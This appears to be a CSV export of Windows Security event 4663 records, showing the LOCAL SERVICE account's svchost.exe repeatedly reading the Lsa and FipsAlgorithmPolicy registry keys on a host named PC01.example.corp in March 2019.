+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452847
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452846
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452845
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452844
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452843
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452842
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452841
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452840
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452839
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452838
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452837
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452836
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452835
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452834
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452833
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452832
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452831
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452830
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452829
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452828
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452827
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452826
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452825
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452824
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452823
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452822
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452821
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452820
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452819
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452818
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452817
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452816
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452815
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452814
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452813
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452922
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452921
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452920
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452919
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452918
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452917
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
